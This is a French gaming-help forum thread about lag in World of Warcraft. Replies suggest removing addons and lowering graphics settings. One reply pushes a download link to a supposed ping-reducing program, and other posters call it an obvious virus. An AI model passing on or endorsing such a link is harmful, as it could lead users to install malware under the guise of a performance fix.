WOW LAG QUE FAIRE

Fermé
pierrect - 21 janv. 2009 à 13:02
 FDS - 11 déc. 2010 à 09:07
Salut, voila avant je joué sur privée tres bien, maintenant je suis sur arak arahm (population moyenne) et je lag pas mal ( quelle paradoxe) Comment ca se fait ? Oo je vais a dalaran , impossible de jouer ca raaaam, certes on me dit que c'est parce que il y a trop de monde mais ca me le fais tres souvent des les autres regions paumés (moins, c'est sur mais un peu quand meme)

Ma connexion est en cpl 85, je suis chez orange, j'ai 1go de ram un double coeur ; 256 mo de memoire graphique, pas de virus ni de trojan, et une defrag faite il n'y a pas longtemps...c'est horrible car ca ne le fait pas a mes pote ;(
Mais bon le truc c'est que si je me cré un petit lvl1 y'aura plus de blem' : / (c'est donc northrend ? )

Merci
A voir également:

7 réponses

Bonjour :)

Pas tester le programme ci dessus mais ça sent bon le virus ou autre ^^ Bon courage et restez prudent ;)
3
ce fichier est évidemment un virus
2
Salut, moi j'ai la solution

C'est ton ping la cause de ca, et pour le reduire telecharge ca (marche juste pour warcraft):

https://ti1ca.com/nocookie.php?code=nvhgboip

telecharge installe et quand ta lancer le fichier vas dans l'onget Latence et met le minimum
1
(je viens de me mettre a wow mais j'ai un 80, on m'a donné un compte ^^ )
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
(enfin ca fait un an que j'y joue mais je viens de me mettre sur l'offi) *
0
toto3131 Messages postés 6 Date d'inscription mercredi 19 août 2009 Statut Membre Dernière intervention 25 août 2009
24 août 2009 à 14:26
Pour essayer de moins lager tu peux , si tu as des addons , en enlever un peu (du genre quest-helper qui prend beaucoup de place ) et tu peux aussi baisser les parametre de resolution et d'effets.
0
Sé ksa marche un peu ton truk la!
0